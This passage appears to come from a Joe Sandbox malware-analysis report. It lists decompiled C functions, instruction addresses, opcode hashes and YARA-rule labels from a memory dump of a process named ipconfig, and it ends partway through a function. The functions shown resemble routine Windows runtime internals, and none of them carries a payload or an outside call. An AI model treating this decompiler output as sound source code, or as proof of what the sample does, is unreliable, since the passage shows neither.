              0x02ef374f
              0x02ef374f
              0x02ef3751
              0x02ef3757
              0x02ef3759
              0x02ef375c
              0x02ef375c
              0x02ef375e
              0x02ef375e
              0x02ef3761
              0x02ef3764
              0x00000000
              0x00000000
              0x02ef3766
              0x02ef3768
              0x02ef37a3
              0x02ef37a3
              0x02ef37a5
              0x02ef37a7
              0x02ef37ad
              0x02ef37b0
              0x02ef37b2
              0x02ef37bc
              0x02ef37c2
              0x02ef37c2
              0x02ef37b2
              0x02e99187
              0x02e99187
              0x02e9918a
              0x02e9918d
              0x02e9918f
              0x02e99192
              0x02e99195
              0x00000000
              0x02e99195
              0x00000000
              0x02ef376a
              0x02ef376a
              0x02ef376a
              0x02ef376c
              0x02ef376c
              0x02ef376f
              0x02ef3775
              0x00000000
              0x00000000
              0x02ef3777
              0x02ef3779
              0x02ef3782
              0x02ef3787
              0x02ef3789
              0x02ef3790
              0x02ef3790
              0x02ef378b
              0x02ef378b
              0x02ef378b
              0x02ef3792
              0x02ef3795
              0x00000000
              0x02ef3795
              0x00000000
              0x02ef3779
              0x02ef3798
              0x00000000
              0x02ef3798
              0x00000000
              0x02ef3768
              0x02ef379b
              0x02ef379b
              0x02ef3751
              0x02ef3749
              0x00000000
              0x02ef3740
              0x02e991a0
              0x02e991a3
              0x02e991a9
              0x02e991b0
              0x00000000
              0x02e991b0
              0x02e99187
              0x02e991b4
              0x02e991b4
              0x02e991bb
              0x02e991c0
              0x02e991c5
              0x02e991c7
              0x02ef37da
              0x02e991cd
              0x02e991cd
              0x02e991cd
              0x02e991d2
              0x02e991d5
              0x02e99239
              0x02e99239
              0x02e991d7
              0x02e991db
              0x02e991e1
              0x02e991e7
              0x02e991fd
              0x02e99203
              0x02e9921e
              0x02e99223
              0x00000000
              0x02e99205
              0x02e99205
              0x02e99208
              0x02e9920c
              0x02e99214
              0x02e99214
              0x02e9920c
              0x02e991e9
              0x02e991e9
              0x02e991ee
              0x02e991f3
              0x02e991f3
              0x02e991f3
              0x02e991e7
              0x00000000
              0x00000000
              0x00000000
              0x02e99134
              0x02e99125
              0x02e9911d
              0x02e9914e
              0x02e990d1
              0x02e990d1
              0x02e990d3
              0x02e990d6
              0x02e990d8
              0x00000000
              0x02e990d8
              0x02e990cf

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a42a01d4468f95796552fdfd1b97d23515a17b7bb5ab2eb0e269f194625a08a
              • Instruction ID: 72c9f7e6cb8bd1d1cf191e47a83c37c2ac17b9ff0c7c749d07eb28a2a98c3c8a
              • Opcode Fuzzy Hash: 7a42a01d4468f95796552fdfd1b97d23515a17b7bb5ab2eb0e269f194625a08a
              • Instruction Fuzzy Hash: D101A472A416049FC7159F14D840B22BBAAEF45364F26906BE6158F792C375DC41CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F2C450 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              C-Code - Quality: 46%
              			E02F2C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E02ED9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E02ED95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E02ED95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E02ED95D0();
				return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






              0x02f2c458
              0x02f2c45d
              0x02f2c466
              0x02f2c468
              0x02f2c469
              0x02f2c46a
              0x02f2c46b
              0x02f2c46e
              0x02f2c46f
              0x02f2c471
              0x02f2c476
              0x02f2c476
              0x02f2c47c
              0x02f2c47e
              0x02f2c480
              0x02f2c480
              0x02f2c483
              0x02f2c484
              0x02f2c486
              0x02f2c488
              0x02f2c48f
              0x02f2c491
              0x02f2c493
              0x02f2c493
              0x02f2c48f
              0x02f2c498
              0x02f2c49e
              0x02f2c4ad
              0x02f2c4ad
              0x02f2c4b2
              0x02f2c4b4
              0x02f2c4cd

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction ID: 172d6ec04e162fd518f7d49a2904997a9f65be48c86f0a54163ad1dc919843d6
              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction Fuzzy Hash: 1C01DE72180515BFD721AF25CD80EA7F76EFF85394F018126F244479A0CB22ACA1CAA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F64015 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E02F64015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E02EB2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E02EB2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2f886ac);
					E02E9F900(0x2f886d4, _t28);
					E02EAFFB0(0x2f886ac, _t28, 0x2f886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E02EAFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







              0x02f6401a
              0x02f6401e
              0x02f64023
              0x02f64028
              0x02f64029
              0x02f6402b
              0x02f6402f
              0x02f64043
              0x02f64046
              0x02f64051
              0x02f64057
              0x02f6405f
              0x02f64062
              0x02f64067
              0x02f6406f
              0x02f6407c
              0x02f6407c
              0x02f6408c
              0x02f6408c
              0x02f64097

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d807180c9aed9ade95eb4432b4851b00477828cced598d0c46c5e4ba85f55d6
              • Instruction ID: 06b04c322e2978a6bc7aba1113053a3faf9dfc153b0daeba39dd06120bc24bb4
              • Opcode Fuzzy Hash: 8d807180c9aed9ade95eb4432b4851b00477828cced598d0c46c5e4ba85f55d6
              • Instruction Fuzzy Hash: 7C018F726819557FD622BB69CD84E53F7ADEF857A0B005225B608CBE11CB24EC11CEE4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F5138A Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              C-Code - Quality: 61%
              			E02F5138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2f8d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02EDFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E02EB7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















              0x02f5138a
              0x02f5138a
              0x02f51399
              0x02f513a3
              0x02f513a8
              0x02f513aa
              0x02f513b5
              0x02f513bb
              0x02f513c3
              0x02f513c6
              0x02f513c9
              0x02f513d4
              0x02f513e6
              0x02f513d6
              0x02f513df
              0x02f513df
              0x02f513f1
              0x02f513f2
              0x02f513f4
              0x02f513f9
              0x02f5140e

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c983f888378e5911817de498d00d0384a0f4aa49acaf0e8e66263968d85b9715
              • Instruction ID: 7bed5725643b6b81884bd0b43ec189dcfe1e2f26c585b5b1847ec009b1cbd86b
              • Opcode Fuzzy Hash: c983f888378e5911817de498d00d0384a0f4aa49acaf0e8e66263968d85b9715
              • Instruction Fuzzy Hash: 5E015271E40218AFDB14DFA9D841FAFB7B8EF45750F00406AF905EB280D674DA01CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F514FB Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              C-Code - Quality: 61%
              			E02F514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2f8d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02EDFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E02EB7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















              0x02f514fb
              0x02f514fb
              0x02f5150a
              0x02f51514
              0x02f51519
              0x02f5151b
              0x02f51526
              0x02f5152c
              0x02f51534
              0x02f51537
              0x02f5153a
              0x02f51545
              0x02f51557
              0x02f51547
              0x02f51550
              0x02f51550
              0x02f51562
              0x02f51563
              0x02f51565
              0x02f5156a
              0x02f5157f

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 79bdcf149b8fa970eef8e6a0371321b6b7e41e917063353a61a32f8da97e7b1d
              • Instruction ID: 41f25742336168c3bc6eae1b9352be1a87158d3f8918da02a06ef4699d3e7927
              • Opcode Fuzzy Hash: 79bdcf149b8fa970eef8e6a0371321b6b7e41e917063353a61a32f8da97e7b1d
              • Instruction Fuzzy Hash: 07019275A41258AFCB00DF68D841FAFB7B8EF45740F00405AF915EB380D670DA01CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E958EC Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E02E958EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x2f8d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x2e75c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E02E95943() != 0 &&  *0x2f85320 > 5) {
					E02F17B5E( &_v44, _t27);
					_t22 =  &_v28;
					E02F17B5E( &_v28, _t28);
					_t11 = E02F17B9C(0x2f85320, 0x2e7bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E02EDB640(_t11, _t17, _v8 ^ _t29, 0x2e7bf15, _t27, _t28);
			}















              0x02e958fb
              0x02e958fe
              0x02e95906
              0x02e9590a
              0x02e9593c
              0x02e9593c
              0x02e9590c
              0x02e9590c
              0x02e95911
              0x00000000
              0x02e95913
              0x02e95913
              0x02e95913
              0x02e95911
              0x02e9591d
              0x02ef1035
              0x02ef103c
              0x02ef103f
              0x02ef1056
              0x02ef1056
              0x02e9593b

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e8c4e9bf2e4005649b6250c18285e33c260865751c972ff730525cd553cbdbd
              • Instruction ID: edb8d2b1a987a11ca8f7df286785d50e9f44f6c26cb8cadb9bfbf8b67144e234
              • Opcode Fuzzy Hash: 7e8c4e9bf2e4005649b6250c18285e33c260865751c972ff730525cd553cbdbd
              • Instruction Fuzzy Hash: E501A731A40108DFDB15EF29DC019BFB7A9EF44264FD5906AA9159B244DF30DD01CA50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F61074 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02F61074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E02F6165E(__ebx, 0x2f88ae4, (__edx -  *0x2f88b04 >> 0x14) + (__edx -  *0x2f88b04 >> 0x14), __edi, __ecx, (__edx -  *0x2f88b04 >> 0x14) + (__edx -  *0x2f88b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E02F5AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E02EB7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E02F4FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











              0x02f61074
              0x02f61080
              0x02f61082
              0x02f6108a
              0x02f6108f
              0x02f61093
              0x02f610ab
              0x02f610ab
              0x02f610c3
              0x02f610cf
              0x02f610e1
              0x02f610d1
              0x02f610da
              0x02f610da
              0x02f610e9
              0x02f610f5
              0x02f610f5
              0x02f610fe

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cc9be77bdb013a8433934bf42b3bcbd51e0f213577ddb897a41be18b6c31939
              • Instruction ID: f29c4080a4acce3f9bea09b3254dd3d5bafbce91d81591f2f9afcab71d2cfbd2
              • Opcode Fuzzy Hash: 6cc9be77bdb013a8433934bf42b3bcbd51e0f213577ddb897a41be18b6c31939
              • Instruction Fuzzy Hash: 6A012872504745AFCB11EB28CD04B2BB7E6EBC4794F048A19FA8993790DE31D450CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EAB02A Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EAB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E02EB7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E02F17016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







              0x02eab037
              0x02eab039
              0x02eab03b
              0x02eab040
              0x02efa60e
              0x00000000
              0x00000000
              0x02efa61d
              0x02eab04b
              0x02eab04e
              0x02efa627
              0x02efa634
              0x00000000
              0x00000000
              0x02efa641
              0x02efa653
              0x02efa643
              0x02efa64c
              0x02efa64c
              0x02efa65b
              0x00000000
              0x00000000
              0x00000000
              0x02efa66c
              0x02eab057
              0x02eab057
              0x02eab057
              0x02eab046
              0x02eab046
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction ID: eb547f15fa80861b1d4cfd913d90e984585b0c8a934d49d1bce8c370bd800da8
              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction Fuzzy Hash: 77017132280580DFD322971CC994F6677D8EB55758F0990A5FA19CFB51D728EC40C620
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F4FEC0 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E02F4FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2f8d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02EDFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E02EB7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















              0x02f4fec0
              0x02f4fec0
              0x02f4fecf
              0x02f4fed9
              0x02f4fede
              0x02f4fee0
              0x02f4feeb
              0x02f4fef3
              0x02f4fef6
              0x02f4fef9
              0x02f4ff04
              0x02f4ff16
              0x02f4ff06
              0x02f4ff0f
              0x02f4ff0f
              0x02f4ff21
              0x02f4ff22
              0x02f4ff24
              0x02f4ff29
              0x02f4ff3e

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d4329fa672a60b339c389d79e42b30ae28f82924369dc5692afaa69bb1c1ceb1
              • Instruction ID: 7c4856526638bbccaf3d57c131bab6a866b3a348ef1048575a81125152e43109
              • Opcode Fuzzy Hash: d4329fa672a60b339c389d79e42b30ae28f82924369dc5692afaa69bb1c1ceb1
              • Instruction Fuzzy Hash: E9018471E40218AFDB14DBA9D845FAFBBB8EF45750F04416AF905AB290EA70DA01CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F4FE3F Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E02F4FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2f8d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02EDFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E02EB7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















              0x02f4fe3f
              0x02f4fe3f
              0x02f4fe4e
              0x02f4fe58
              0x02f4fe5d
              0x02f4fe5f
              0x02f4fe6a
              0x02f4fe72
              0x02f4fe75
              0x02f4fe78
              0x02f4fe83
              0x02f4fe95
              0x02f4fe85
              0x02f4fe8e
              0x02f4fe8e
              0x02f4fea0
              0x02f4fea1
              0x02f4fea3
              0x02f4fea8
              0x02f4febd

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53439a911b89feade4987ceef15d21923ee3766311c1a72c0a70114fc82f20d5
              • Instruction ID: 6d9d628f3efd7b93639c59f6d806fab8a9fefa7bbe40561a560722552d26cd8a
              • Opcode Fuzzy Hash: 53439a911b89feade4987ceef15d21923ee3766311c1a72c0a70114fc82f20d5
              • Instruction Fuzzy Hash: C601D471E40218AFCB14DFA8D801FAEBBB8EF40700F00806AF904AB281DA70D901CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F68A62 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E02F68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x2f8d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E02EB7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EDB640(E02ED9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















              0x02f68a62
              0x02f68a71
              0x02f68a79
              0x02f68a82
              0x02f68a85
              0x02f68a89
              0x02f68a8c
              0x02f68a8f
              0x02f68a92
              0x02f68a95
              0x02f68a9f
              0x02f68ab1
              0x02f68aa1
              0x02f68aaa
              0x02f68aaa
              0x02f68abc
              0x02f68abd
              0x02f68abf
              0x02f68ac4
              0x02f68ada

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5d2b313c4e3ed823a8503f6cc951ba4e7cf37c2198709b8b76c2ee2306f9a8b3
              • Instruction ID: dc668f3013c1b01c429fc14c8d0a02ebbfacf5c7bd0735ffafd784face9d44da
              • Opcode Fuzzy Hash: 5d2b313c4e3ed823a8503f6cc951ba4e7cf37c2198709b8b76c2ee2306f9a8b3
              • Instruction Fuzzy Hash: 72012C72A4021CAFCB00DFA9D9459EEB7B8EF49350F10405AFA04E7381E634A901CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F68ED6 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E02F68ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x2f8d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
